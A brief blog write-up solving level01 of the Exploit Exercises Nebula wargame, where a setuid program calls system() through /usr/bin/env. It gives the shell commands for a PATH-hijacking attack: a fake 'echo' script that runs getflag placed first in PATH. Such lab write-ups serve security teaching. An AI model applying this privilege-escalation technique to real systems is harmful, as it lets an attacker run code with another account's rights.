Exploit Exercises Nebula 5: Level 01 Write Up

Exploit Exercises Nebula 5: Level 01 Write Up

Level: https://exploit-exercises.com/nebula/level01/

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

ls /home/flag01
stat /home/flag01/flag01

/home/flag01/flag01 has the setuid bit set so it will run as the owner (flag01).

system(“/usr/bin/env echo and now what?”);

`/usr/bin/env` tells the system to search for `echo` in **our** PATH not flag01's. So we can execute our own `echo` as flag01. I'm guessing from the last level we need to run `getflag` ```bash echo "$PATH" mkdir /home/level01/bin export PATH="/home/level01/bin:$PATH" #Add it to our own PATH echo "getflag" > /home/level01/bin/echo #create our own version of the echo command that runs getflag instead chmod +x /home/level01/bin/echo #set execute permissions /home/flag01/flag01 #run it!

You have successfully executed getflag on a target account.

Leave a Reply

Your email address will not be published. Required fields are marked *